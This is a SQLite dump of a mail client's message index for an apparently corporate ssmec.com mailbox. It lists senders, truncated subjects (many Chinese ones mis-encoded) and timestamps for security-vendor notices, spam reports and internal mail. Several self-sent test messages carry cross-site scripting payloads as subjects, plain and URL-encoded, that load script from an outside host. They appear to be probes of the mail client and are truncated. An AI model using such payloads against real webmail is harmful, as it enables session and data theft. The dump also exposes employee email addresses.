PRAGMA foreign_keys=OFF;

BEGIN TRANSACTION;

CREATE TABLE t_message_help(f_msguid int,f_flag4 int,f_flag5 int,f_flag6 int,f_msgid varchar(64) not null,f_message_id varchar(128),f_msgtid varchar(128),f_msgdid varchar(32),f_tag varchar(32),f_from varchar(256),f_rcpt char(1),f_subject varchar(32),f_state int,f_type int,f_subtype int,f_inserttime int,f_modifytime int,f_rcpttime int,f_sendtime int,f_flag int,f_flag2 int,f_flag3 int,f_messagelen int,f_getflag int);

INSERT INTO "t_message_help" VALUES(73,0,0,86882,'16880645693891_129767_tm','1686464094244@root',NULL,'74ce51c2e6c086fe8acc7495c34aa1d9','new','"ʼ" <spamreport@ssmec.com>','0','1ʼժҪ',0,0,0,1688064569,1688064569,1688064569,1688064564,1,0,0,3742,1);

INSERT INTO "t_message_help" VALUES(75,0,0,89577,'16880936481391_129448_tm','313752637.235.1688093638074@pps03.p04.phx01.qualys.com',NULL,'ea690936d6bb38701851eebdfa670fe3','new','Qualys Inc  <qualys@qualys.net>','0','Qualys: Web Application Vulnerab',0,0,0,1688093648,1688093648,1688093648,1688093638,1,0,0,13079,1);

INSERT INTO "t_message_help" VALUES(76,0,0,91266,'16881003262835_129581_tm','1073968231.809.1688100314404@pps02.p04.phx01.qualys.com',NULL,'9ccd5157c828f04f2f46cce2b7af359e','new','Qualys Inc  <qualys@qualys.net>','0','Qualys: Web Application Vulnerab',0,0,0,1688100326,1688100326,1688100326,1688100314,1,0,0,13902,1);

INSERT INTO "t_message_help" VALUES(78,0,0,94899,'16883776042224_121433_tm','1688119740184@root',NULL,'63a5b897fb0d567ab84752bb31364df2','new','"ʼ" <spamreport@ssmec.com>','0','1ʼժҪ',0,0,0,1688377604,1688377604,1688377604,1688377596,1,0,0,3680,NULL);

INSERT INTO "t_message_help" VALUES(79,0,0,95641,'16883803643664_121431_tm','20230703054125.BD5961B674@qwb01.p04.phx01.qualys.com',NULL,'5669a1e18388e7c5d7176f9ce3d6dc00','new','web-bugs-prod@qualys.com','0','[SPAM]Qualys - Latest vulnerabil',0,0,0,1688380364,1688380364,1688362968,1688362885,1,0,0,534036,NULL);

INSERT INTO "t_message_help" VALUES(80,0,0,97665,'16883857691464_121213_tm','375731736.939.1688385756854@pps02.p04.phx01.qualys.com',NULL,'56a1e544b5a59280a111bdfc20e5fc90','new','Qualys Inc  <qualys@qualys.net>','0','Qualys: Web Application Vulnerab',0,0,0,1688385769,1688385769,1688385769,1688385756,1,0,0,13104,NULL);

INSERT INTO "t_message_help" VALUES(81,0,0,99356,'16883891162309_121158_tm','673117408.1917.1688389105131@pps01.p04.phx01.qualys.com',NULL,'240b1a66538cc3207f5e33a6fd10c49a','new','Qualys Inc  <qualys@qualys.net>','0','Qualys: Web Application Vulnerab',0,0,0,1688389116,1688389116,1688389116,1688389105,1,0,0,13959,NULL);

INSERT INTO "t_message_help" VALUES(83,0,0,103082,'16884342860691_121130_tm','1526555135.275.1688434277232@pps03.p04.phx01.qualys.com',NULL,'2300728cff3812cb141867596350dbaa','new','Qualys Inc  <qualys@qualys.net>','0','Qualys: Web Application Vulnerab',0,0,0,1688434286,1688434286,1688434286,1688434277,1,0,0,13155,NULL);

INSERT INTO "t_message_help" VALUES(84,0,0,104778,'16884360761551_121165_tm','815082805.151.1688436061671@pps02.p04.phx01.qualys.com',NULL,'1b199b4591ca97013ac8c69d7955794f','new','Qualys Inc  <qualys@qualys.net>','0','Qualys: Web Application Vulnerab',0,0,0,1688436077,1688436077,1688436076,1688436061,1,0,0,13949,NULL);

INSERT INTO "t_message_help" VALUES(85,0,0,106483,'16884381222672_121162_tm','153458632.2057.1688438110277@pps01.p04.phx01.qualys.com',NULL,'45a14af84f370306d3930b66901648c3','new','Qualys Inc  <qualys@qualys.net>','0','Qualys: Web Application Vulnerab',0,0,0,1688438122,1688438122,1688438122,1688438110,1,0,0,13166,NULL);

INSERT INTO "t_message_help" VALUES(86,0,0,108181,'16884382372978_121134_tm','1089362299.161.1688438226615@pps02.p04.phx01.qualys.com',NULL,'97eb011a488390f2f3299264f36b8d02','new','Qualys Inc  <qualys@qualys.net>','0','Qualys: Web Application Vulnerab',0,0,0,1688438237,1688438237,1688438237,1688438226,1,0,0,13158,NULL);

INSERT INTO "t_message_help" VALUES(87,0,0,109881,'16884640152632_121432_tm','1688121611959@root',NULL,'5d1f48e025425258e3fe623f08458777','new','"ʼ" <spamreport@ssmec.com>','0','1ʼժҪ',0,0,0,1688464015,1688464015,1688464015,1688464010,1,0,0,3618,NULL);

INSERT INTO "t_message_help" VALUES(88,0,0,110618,'16885209823213_121439_tm','127892123.24849449.1688392808354@abmktmail-trigger1h.marketo.org',NULL,'09585d5ae5926b96e307b03870a3e581','new','Tenable <marketing@tenable.com>','0','[SPAM]Check_out_this_weeks_Cy',0,0,0,1688520982,1688520982,1688392869,1688392808,1,0,0,16896,NULL);

INSERT INTO "t_message_help" VALUES(89,0,0,112733,'16885210903491_121218_tm','3909b20c.7ce.18923b31331.Coremail.18710105906@163.com',NULL,'16bf0a803bd77064ccd2739003025529','new',' <18710105906@163.com>','0','Fw:sss',0,0,0,1688521090,1688521090,1688521090,1688521085,1,0,0,4513,NULL);

INSERT INTO "t_message_help" VALUES(90,0,0,114214,'16885504642912_121425_tm','1688124676576@root',NULL,'8e893d9aeca003ee3ea628fc18de90d5','new','"ʼ" <spamreport@ssmec.com>','0','1ʼժҪ',0,0,0,1688550464,1688550464,1688550464,1688550458,1,0,0,3692,1);

INSERT INTO "t_message_help" VALUES(91,0,0,114953,'16885535491072_121427_tm',' <64a51335e389b_13f81c4bd9d385194739@melody-worker-email-render.mail',NULL,'125de1b3068954ee880d10564c564d79','new','Mohsinali Shah <moshah@qualys.com>','0','Here''s how to get more visibilit',0,0,0,1688553549,1688553549,1688540014,1688539958,1,0,0,18816,NULL);

INSERT INTO "t_message_help" VALUES(92,0,0,121154,'16886091883347_121263_tm','202307060200.36620DeF045181@spam.ssmec.com',NULL,'3b5718eb59a986fac1f6ae281231b416','new','"sysadmin" <sysadmin@ssmec.com>','0','Spam-blocking Notice --- 2023-07',0,0,0,1688609188,1688609188,1688609188,1688608813,1,0,0,11033,1);

INSERT INTO "t_message_help" VALUES(93,0,0,121989,'16887000471079_121437_tm','1690748043236@ssmec.com',NULL,'0392dec25854a0d793a303e9456f9e41','new','"ŭZ" <zhangjing@ssmec.com>','0','ڿչ2023ӦԱ',0,0,0,1688700063,1688700063,1688700047,1688700040,1,0,0,157924,1);

INSERT INTO "t_message_help" VALUES(95,0,0,124550,'16887233152082_121425_tm','1688132757321@root',NULL,'2cd0f67748e847b322e5f650a8932e3b','new','"ʼ" <spamreport@ssmec.com>','0','1ʼժҪ',0,0,0,1688723315,1688723315,1688723315,1688723309,1,0,0,4760,1);

INSERT INTO "t_message_help" VALUES(96,0,0,125291,'16887302292258_121428_tm','4cae3dfce0c147d0b8afd5ac24b66b56.20230707.1688713708@qcloudmail.com',NULL,'572ff84aa7a09e02a4aa7099c96f7a77','new','Ѷ <CSIG_Marketing@csig.marketing.tencent-cloud.com>','0','[SPAM]ɻ_|_ͨԺX',0,0,0,1688730229,1688730229,1688713758,1688713708,1,0,0,8472,1);

INSERT INTO "t_message_help" VALUES(97,0,0,126885,'16887302292255_121431_tm','202307060952.3669q1LV047721@spam.ssmec.com',NULL,'c7d652a56dddcdb3a6152ca58780fee5','new','The Nessus Team <nessusteam@tenable.com>','0','Finish Installing your Nessus Tr',0,0,0,1688730229,1688730229,1688637502,1688548594,1,0,0,44491,1);

INSERT INTO "t_message_help" VALUES(99,0,0,130867,'16888097490728_121425_tm','1688140343217@root',NULL,'11d93b314d83424a044b86efef4bf377','new','"ʼ" <spamreport@ssmec.com>','0','1ʼժҪ',0,0,0,1688809749,1688809749,1688809749,1688809742,1,0,0,3602,1);

INSERT INTO "t_message_help" VALUES(100,0,0,131603,'16889522682143_121230_tm','202307100924327351666@ssmec.com',NULL,'ba9f1c2b1a5380e153127cc974dfce4a','new','"fzzhao@ssmec.com" <fzzhao@ssmec.com>','0','ת: : ǽ',0,0,0,1688952268,1688952268,1688952268,1688952273,1,0,0,1070394,1);

INSERT INTO "t_message_help" VALUES(101,0,0,133116,'1688959091369_1692903664790_wm','1692903762620@ssmec.com',NULL,'7908bd740e18e166097ce155b0292624','send','"1" <lilei@ssmec.com>','0','ssse',0,0,0,1688959091,1688959091,1688959091,1688959091,1,0,0,2275,NULL);

INSERT INTO "t_message_help" VALUES(102,0,0,133700,'16889608251105_121121_tm','2023071011465953953123@ssmec.com',NULL,'e9f2c0183f03ad3107702243a0a0ab78','new','"penglin@ssmec.com" <penglin@ssmec.com>','0','ϢȫС鹤',0,0,0,1688960826,1688960826,1688960825,1688960820,1,0,0,4311831,1);

INSERT INTO "t_message_help" VALUES(103,0,0,134618,'16889610191633_121434_tm','1692949656806@ssmec.com',NULL,'3ad5cbc9b5d57aa59d3a8894e8903e32','new','"֣" <zhengcao@ssmec.com>','0','20236·н귢˵',0,0,0,1688961039,1688961039,1688961020,1688961013,1,0,0,374189,1);

INSERT INTO "t_message_help" VALUES(104,0,0,135549,'16889677250297_121241_tm','20230710054140.118D81B687@qwb01.p04.phx01.qualys.com',NULL,'94664230c07f1a25fa2937bb16e13459','new','web-bugs-prod@qualys.com','0','Qualys - Latest vulnerabilities ',0,0,0,1688967725,1688967725,1688967725,1688967700,1,0,0,231382,1);

INSERT INTO "t_message_help" VALUES(105,0,0,137299,'16890336411321_121265_tm',' <64ac9b9dc539b_13fb35f825f8013283635@melody-worker-email-render.mail',NULL,'92bd433a179ff18b77482fe9db791050','new','Mohsinali Shah <moshah@qualys.com>','0','Discover, Prioritize, and Remedi',0,0,0,1689033641,1689033641,1689033641,1689033630,1,0,0,17403,1);

INSERT INTO "t_message_help" VALUES(108,0,0,148588,'16891306451827_121434_tm','1696018415706@ssmec.com',NULL,'02dd5bcf7c7019ce96424e07b67e2e27','new','"" <gpzhu@ssmec.com>','0','Fwd:ڿչ2023в',0,0,0,1689130650,1689130650,1689130645,1689130639,1,0,0,410551,NULL);

INSERT INTO "t_message_help" VALUES(109,0,0,149757,'16891341653317_121239_tm','000a01d9b474$cadbf8c0$6093ea40$@ssmec.com',NULL,'f125ac4a01e1ca3f2bc6b83b42975253','new','"lilei" <lilei@ssmec.com>','0','ITݲ',0,0,0,1689134166,1689134166,1689134166,1689134169,1,0,0,2938277,NULL);

INSERT INTO "t_message_help" VALUES(111,0,0,153460,'16891455932614_121321_tm','202307120700.36C70Cxr099445@spam.ssmec.com',NULL,'7d727808bbd06a6d17d143f04c0a7f3a','new','"sysadmin" <sysadmin@ssmec.com>','0','Spam-blocking Notice --- 2023-07',0,0,0,1689145594,1689145594,1689145593,1689145212,1,0,0,11133,NULL);

INSERT INTO "t_message_help" VALUES(112,0,0,154293,'16891554312153_121438_tm','1688166033817@root',NULL,'ae890bde89c79ab10d6bc61e12fcc068','new','"ʼ" <spamreport@ssmec.com>','0','1ʼժҪ',0,0,0,1689155431,1689155431,1689155431,1689155422,1,0,0,5932,NULL);

INSERT INTO "t_message_help" VALUES(113,0,0,155035,'16891728281361_121147_tm','202307121434.36CEYUCK085747@spam.ssmec.com',NULL,'e7b5831c1c01f3c51459b378719b2dcd','new','"sysadmin" <sysadmin@ssmec.com>','0','Spam-blocking Notice --- 2023-07',0,0,0,1689172828,1689172828,1689172828,1689145212,1,0,0,11309,NULL);

INSERT INTO "t_message_help" VALUES(114,0,0,155897,'16891728381382_121321_tm','202307121434.36CEYeqg085808@spam.ssmec.com',NULL,'cef857c33a7410dc5559845b71824f3e','new','web-bugs-prod@qualys.com','0','Qualys - Latest vulnerabilities ',0,0,0,1689172838,1689172838,1689172838,1688967700,1,0,0,231576,1);

INSERT INTO "t_message_help" VALUES(115,0,0,157706,'16891728411393_121330_tm','202307121434.36CEYhx1085819@spam.ssmec.com',NULL,'fe6202e7bb9999f9c55b5259ba187d4d','new','Mohsinali Shah <moshah@qualys.com>','0','Discover, Prioritize, and Remedi',0,0,0,1689172841,1689172841,1689172841,1689033630,1,0,0,17578,NULL);

INSERT INTO "t_message_help" VALUES(116,0,0,163337,'16891728491420_121322_tm','202307121434.36CEYpHi085907@spam.ssmec.com',NULL,'69843ae63b8d93ce27b6de450c0fa5ae','new','Ѷ <CSIG_Marketing@csig.marketing.tencent-cloud.com>','0','ɻ_|_ͨԺXѶ',0,0,0,1689172849,1689172849,1689172849,1688713708,1,0,0,8453,1);

INSERT INTO "t_message_help" VALUES(118,0,0,166580,'16891728521435_121304_tm','202307121434.36CEYsbS085939@spam.ssmec.com',NULL,'7d2590474b26a12aa19a03d6cee764c9','new','The Nessus Team <nessusteam@tenable.com>','0','Finish Installing your Nessus Tr',0,0,0,1689172852,1689172852,1689172852,1688548594,1,0,0,44406,1);

INSERT INTO "t_message_help" VALUES(119,0,0,168443,'16891728561449_121315_tm','202307121434.36CEYwRr085969@spam.ssmec.com',NULL,'5c5ffe20830dceb14a3fea00650decc0','new','"sysadmin" <sysadmin@ssmec.com>','0','Spam-blocking Notice --- 2023-07',0,0,0,1689172856,1689172856,1689172856,1688608813,1,0,0,11209,1);

INSERT INTO "t_message_help" VALUES(121,0,0,171744,'16891728591467_121122_tm','202307121435.36CEZ1te086126@spam.ssmec.com',NULL,'338607b24614694ab1d747c97632eca9','new','Mohsinali Shah <moshah@qualys.com>','0','Here''s how to get more visibilit',0,0,0,1689172859,1689172859,1689172859,1688539958,1,0,0,17321,NULL);

INSERT INTO "t_message_help" VALUES(122,0,0,177447,'16891728631486_121212_tm','202307121435.36CEZ5dr086186@spam.ssmec.com',NULL,'839c90f36619f47611041083da01e45b','new',' <18710105906@163.com>','0','Fw:sss',0,0,0,1689172863,1689172863,1689172863,1688521085,1,0,0,4707,NULL);

INSERT INTO "t_message_help" VALUES(124,0,0,180829,'16891728661496_121145_tm','202307121435.36CEZ83t086206@spam.ssmec.com',NULL,'c0add702aa704813e15c02c2a35c1781','new','Qualys Inc  <qualys@qualys.net>','0','Qualys: Web Application Vulnerab',0,0,0,1689172866,1689172866,1689172866,1688438226,1,0,0,13348,NULL);

INSERT INTO "t_message_help" VALUES(128,0,0,191184,'16891728691502_121175_tm','202307121435.36CEZBaW086217@spam.ssmec.com',NULL,'432dd8f524063feee51b8ea968ab42e9','new','Qualys Inc  <qualys@qualys.net>','0','Qualys: Web Application Vulnerab',0,0,0,1689172869,1689172869,1689172869,1688438110,1,0,0,13356,NULL);

INSERT INTO "t_message_help" VALUES(130,0,0,195056,'16891728731511_121323_tm','202307121435.36CEZFjU086230@spam.ssmec.com',NULL,'65472358500905a62ff7440eb13ef0b0','new','Qualys Inc  <qualys@qualys.net>','0','Qualys: Web Application Vulnerab',0,0,0,1689172873,1689172873,1689172873,1688436061,1,0,0,14140,NULL);

INSERT INTO "t_message_help" VALUES(131,0,0,196811,'16891728761521_121124_tm','202307121435.36CEZI8Y086240@spam.ssmec.com',NULL,'56141c07ac9438b28f2933d22657164f','new','Qualys Inc  <qualys@qualys.net>','0','Qualys: Web Application Vulnerab',0,0,0,1689172876,1689172876,1689172876,1688434277,1,0,0,13345,NULL);

INSERT INTO "t_message_help" VALUES(132,0,0,198566,'16891728791526_121137_tm','202307121435.36CEZL53086249@spam.ssmec.com',NULL,'7876aedecf20ecfd9a713682987276a8','new','Tenable <marketing@tenable.com>','0','Check_out_this_weeks_Cybersec',0,0,0,1689172879,1689172879,1689172879,1688392808,1,0,0,16195,NULL);

INSERT INTO "t_message_help" VALUES(135,0,0,204664,'16891728831533_121117_tm','202307121435.36CEZPTr086262@spam.ssmec.com',NULL,'52efe12f7bf6e0c27353a8e487614828','new','Qualys Inc  <qualys@qualys.net>','0','Qualys: Web Application Vulnerab',0,0,0,1689172883,1689172883,1689172883,1688389105,1,0,0,14149,NULL);

INSERT INTO "t_message_help" VALUES(138,0,0,210141,'16891728861541_121303_tm','202307121435.36CEZS3e086270@spam.ssmec.com',NULL,'90ca0edca81598acd1d029dd51e036ca','new','Qualys Inc  <qualys@qualys.net>','0','Qualys: Web Application Vulnerab',0,0,0,1689172886,1689172886,1689172886,1688385756,1,0,0,13295,NULL);

INSERT INTO "t_message_help" VALUES(139,0,0,211888,'16891728901549_121284_tm','202307121435.36CEZVup086282@spam.ssmec.com',NULL,'7e33108655f9aad2f7dcfa602e3a1684','new','web-bugs-prod@qualys.com','0','Qualys - Latest vulnerabilities ',0,0,0,1689172890,1689172890,1689172890,1688362885,1,0,0,533822,NULL);

INSERT INTO "t_message_help" VALUES(140,0,0,213708,'16891728931561_121113_tm','202307121435.36CEZZCu086301@spam.ssmec.com',NULL,'552f33e23ed6330296495592cd6829a2','new','Qualys Inc  <qualys@qualys.net>','0','Qualys: Web Application Vulnerab',0,0,0,1689172893,1689172893,1689172893,1688100314,1,0,0,14092,NULL);

INSERT INTO "t_message_help" VALUES(141,0,0,215455,'16891728961568_121185_tm','202307121435.36CEZcJe086309@spam.ssmec.com',NULL,'8f8dbd2b4010f2d442aa9f8c921c37df','new','Qualys Inc  <qualys@qualys.net>','0','Qualys: Web Application Vulnerab',0,0,0,1689172896,1689172896,1689172896,1688093638,1,0,0,13270,NULL);

INSERT INTO "t_message_help" VALUES(162,0,0,256895,'1689174382473_1697465290430_wm','1697465427156@ssmec.com',NULL,'687667e21771caf131bee8dad2fe9670','send','"1" <lilei@ssmec.com>','0','testxss',0,0,0,1689174382,1689174382,1689174382,1689174382,1,0,0,4061,NULL);

INSERT INTO "t_message_help" VALUES(163,0,0,257464,'16891743880096_121425_tm','1697465427156@ssmec.com',NULL,'687667e21771caf131bee8dad2fe9670','new','"1" <lilei@ssmec.com>','0','testxss',0,0,0,1689174388,1689174388,1689174388,1689174382,1,0,0,4270,NULL);

INSERT INTO "t_message_help" VALUES(164,0,0,258797,'1689174913132_1697471307320_wm','1697471444090@ssmec.com',NULL,'f694593884a7d95b063b24cf592f8df3','send','"1" <lilei@ssmec.com>','0','lilei@ssmec.comʼ',0,0,0,1689174913,1689174913,1689174913,1689174913,1,0,0,3515,NULL);

INSERT INTO "t_message_help" VALUES(165,0,0,259449,'16891749180895_121439_tm','1697471444090@ssmec.com',NULL,'f694593884a7d95b063b24cf592f8df3','new','"1" <lilei@ssmec.com>','0','lilei@ssmec.comʼ',0,0,0,1689174918,1689174918,1689174918,1689174913,1,0,0,3724,1);

INSERT INTO "t_message_help" VALUES(166,0,0,260917,'1689175000441_1697473906121_wm','1697474042910@ssmec.com',NULL,'638898a129946fca4e8997c389e73bfd','send','"1" <lilei@ssmec.com>','0','<script src=http://xsscom.com//Y',0,0,0,1689175000,1689175000,1689175000,1689175000,1,0,0,3129,NULL);

INSERT INTO "t_message_help" VALUES(167,0,0,261615,'16891750061043_121440_tm','1697474042910@ssmec.com',NULL,'638898a129946fca4e8997c389e73bfd','new','"1" <lilei@ssmec.com>','0','<script src=http://xsscom.com//Y',0,0,0,1689175006,1689175006,1689175006,1689175000,1,0,0,3338,1);

INSERT INTO "t_message_help" VALUES(168,0,0,263262,'1689210474566_1697663488283_wm','1697663626451@ssmec.com',NULL,'4d37ce7e387fcafc3fb4e7d4ccec3d57','send','"1" <lilei@ssmec.com>','0','%3CsCRiPt%20sRC%3D%2',0,0,0,1689210474,1689210474,1689210474,1689210474,1,0,0,6397,NULL);

INSERT INTO "t_message_help" VALUES(169,0,0,264091,'16892104803672_121440_tm','1697663626451@ssmec.com',NULL,'4d37ce7e387fcafc3fb4e7d4ccec3d57','new','"1" <lilei@ssmec.com>','0','%3CsCRiPt%20sRC%3D%2',0,0,0,1689210480,1689210480,1689210480,1689210474,1,0,0,6606,NULL);

INSERT INTO "t_message_help" VALUES(171,0,0,267785,'16892418432590_121425_tm','1688176149684@root',NULL,'7c40b50855de79985deeb384dd42a0ee','new','"ʼ" <spamreport@ssmec.com>','0','1ʼժҪ',0,0,0,1689241843,1689241843,1689241843,1689241837,1,0,0,16120,NULL);

INSERT INTO "t_message_help" VALUES(172,0,0,268525,'16893280103854_121435_tm','1702098536546@ssmec.com',NULL,'727bb67d70995be5ab9d9959183b2fba','new','"" <gpzhu@ssmec.com>','0','άȫv12޸Ľ',0,0,0,1689328012,1689328012,1689328010,1689328003,1,0,0,2925490,NULL);

INSERT INTO "t_message_help" VALUES(173,0,0,269424,'16895521370127_121122_tm',' <64b484f2805f6_13f9800a166e8773264@melody-worker-email-render.mail',NULL,'eb514fc9b16918b4a1345e3aee1b4d96','new','Mohsinali Shah <moshah@qualys.com>','0','You_Havent_logged_into_Qualys',0,0,0,1689552137,1689552137,1689552137,1689552115,5,0,0,14504,NULL);

INSERT INTO "t_message_help" VALUES(174,0,0,275040,'16895575843187_121251_tm',' <DM6PR06MB4907655716C6CD6D8C7285B7A63BA@DM6PR06MB4907.namprd06.prod.outlook.com',NULL,'0100ccc9afa85705991bdc619fddee4f','new','Mohsinali Shah <moshah@qualys.com>','0','RE: You Havent logged into Qu',0,0,0,1689557584,1689557584,1689557584,1689557568,1,0,0,43230,NULL);

INSERT INTO "t_message_help" VALUES(175,0,0,281249,'16895605700303_121312_tm',' <DM6PR06MB4907D9EEB7764F57C24E2112A63BA@DM6PR06MB4907.namprd06.prod.outlook.com',NULL,'65155888aa568933b861a09957ce79f4','new','Mohsinali Shah <moshah@qualys.com>','0','RE: You Havent logged into Qu',0,0,0,1689560570,1689560570,1689560570,1689560559,1,0,0,36079,1);

INSERT INTO "t_message_help" VALUES(176,0,0,287448,'16895726011335_121256_tm','20230717054304.B89AE1B6AD@qwb01.p04.phx01.qualys.com',NULL,'a251cbeb603852174393f2cb79ce80f0','new','web-bugs-prod@qualys.com','0','Qualys - Latest vulnerabilities ',0,0,0,1689572601,1689572601,1689572601,1689572584,1,0,0,83842,1);

INSERT INTO "t_message_help" VALUES(177,0,0,289197,'16895727721803_121315_tm','000d01d9b872$01b0d950$05128bf0$@ssmec.com',NULL,'0df883059f7750724c5b6610fd671df9','new','ٻ <wangqian@ssmec.com>','0','20237²ʱ䰲',0,0,0,1689572789,1689572789,1689572789,1689572777,1,0,0,28128,1);

INSERT INTO "t_message_help" VALUES(178,0,0,290168,'16895769462002_121434_tm','1707575395266@ssmec.com',NULL,'369e0b33ea456fb05dc4725e62b9a9c3','new','"ɺ" <sspeng@ssmec.com>','0','ס',0,0,0,1689576969,1689576969,1689576946,1689576941,1,0,0,531195,1);

INSERT INTO "t_message_help" VALUES(179,0,0,291345,'16895988332985_121274_tm','1482344003.36380484.1689598819832@abmktmail-trigger1f.marketo.org',NULL,'247e2dfd650a2b9f7447ae63d0dca483','new','Tenable <marketing@tenable.com>','0','Check_out_this_weeks_Cybersec',0,0,0,1689599058,1689599058,1689598833,1689598819,1,0,0,16213,1);

INSERT INTO "t_message_help" VALUES(180,0,0,293218,'16896516130853_121428_tm','1710547449758@ssmec.com',NULL,'e9214d2dc598225909515da31818f6c4','new','"»" <denglu@ssmec.com>','0','2023ڶ',0,0,0,1689651628,1689651628,1689651613,1689651607,1,0,0,464158,1);

INSERT INTO "t_message_help" VALUES(181,0,0,294142,'16897481712227_121187_tm',NULL,NULL,'63b3694458daa9e6aaa060494e84759a','new','Microsoft Outlook <lilei@ssmec.com>','0','Microsoft Outlook Ϣ',0,0,0,1689748171,1689748171,1689748171,1689748171,1,0,0,745,1);

INSERT INTO "t_message_help" VALUES(182,0,0,294759,'16897503980433_121344_tm','202307190700.36J70ALL052421@spam.ssmec.com',NULL,'4ea649168ea2fbb01017ea6277933723','new','"sysadmin" <sysadmin@ssmec.com>','0','Spam-blocking Notice --- 2023-07',0,0,0,1689750398,1689750398,1689750398,1689750010,1,0,0,11122,1);

INSERT INTO "t_message_help" VALUES(183,0,0,295584,'16897556702182_121166_tm','202307190828.36J8SGRC068818@spam.ssmec.com',NULL,'8c5315455f25bdea8a198bb3745889c9','spam','Tenable in APAC <webinar@tenable.com>','0','[SPAM]26 July - Safe Manufacturi',0,0,0,1689755713,1689755713,1689755670,1689735674,1,0,0,45700,NULL);

INSERT INTO "t_message_help" VALUES(184,0,0,297693,'16897603483020_121438_tm','1688245327572@root',NULL,'57d92763d8e7a9243e6c34880d3adb14','new','"ʼ" <spamreport@ssmec.com>','0','1ʼժҪ',0,0,0,1689760348,1689760348,1689760348,1689760342,1,0,0,3746,1);

INSERT INTO "t_message_help" VALUES(186,0,0,300557,'16902024272173_17576_tm','1689944908635@root',NULL,'343c90e5c5bdb36d70225bce6f0716d8','new','"ʼ" <spamreport@ssmec.com>','0','1ʼժҪ',0,0,0,1690202428,1690202428,1690202427,1690202421,1,0,0,3820,1);

INSERT INTO "t_message_help" VALUES(187,0,0,301299,'16905112562455_17582_tm','1692721867481@ssmec.com',NULL,'307ae346cddcd48472de16c4e1d04896','new','"" <gpzhu@ssmec.com>','0','Fwd:Re:2¥װ豸',0,0,0,1690511257,1690511257,1690511256,1690511250,1,0,0,104091,NULL);

INSERT INTO "t_message_help" VALUES(188,0,0,302144,'16905501341148_17294_tm','296893092.3279137.1690550127951@abmktmail-trigger1g.marketo.org',NULL,'00fa98c6bd47101980d15db24506875e','spam','Team Tenable <marketing@tenable.com>','0','[SPAM]ܹ',0,0,0,1690550173,1690550173,1690550134,1690550127,1,0,0,52278,NULL);

INSERT INTO "t_message_help" VALUES(189,0,0,304714,'1690849881853_1690876723762_wm','1690876746006@ssmec.com',NULL,'a1c0ad94ea57d7e1779e002440ba6815','send','"1" <lilei@ssmec.com>','0','aaaa',0,0,0,1690849881,1690849881,1690849881,1690849881,1,0,0,2287,NULL);

INSERT INTO "t_message_help" VALUES(190,0,0,305267,'16908498873313_80541_tm','1690876746006@ssmec.com',NULL,'a1c0ad94ea57d7e1779e002440ba6815','new','"1" <lilei@ssmec.com>','0','aaaa',0,0,0,1690849887,1690849887,1690849887,1690849881,1,0,0,2496,NULL);

INSERT INTO "t_message_help" VALUES(191,0,0,306485,'1690869200310_1690990644637_wm','1690990671519@ssmec.com',NULL,'33344a32802292dc779b553d327f54e8','send','"1" <lilei@ssmec.com>','0','bnm',0,0,0,1690869200,1690869200,1690869200,1690869200,1,0,0,2239,NULL);

INSERT INTO "t_message_help" VALUES(192,0,0,307036,'16908692051679_80544_tm','1690990671519@ssmec.com',NULL,'33344a32802292dc779b553d327f54e8','new','"1" <lilei@ssmec.com>','0','bnm',0,0,0,1690869206,1690869206,1690869205,1690869200,1,0,0,2448,NULL);

CREATE INDEX messagehelp_message_id ON t_message_help(f_message_id);

CREATE INDEX messagehelp_msguid ON t_message_help(f_msguid);

CREATE INDEX messagehelp_msgid ON t_message_help(f_msgid);

CREATE INDEX messagehelp_msgtid ON t_message_help(f_msgtid);

CREATE INDEX messagehelp_tag_flag ON t_message_help(f_tag,f_flag);

CREATE INDEX messagehelp_tag ON t_message_help(f_tag);

CREATE INDEX messagehelp_rcpttime ON t_message_help(f_rcpttime);

CREATE INDEX messagehelp_sendtime ON t_message_help(f_sendtime);

COMMIT;

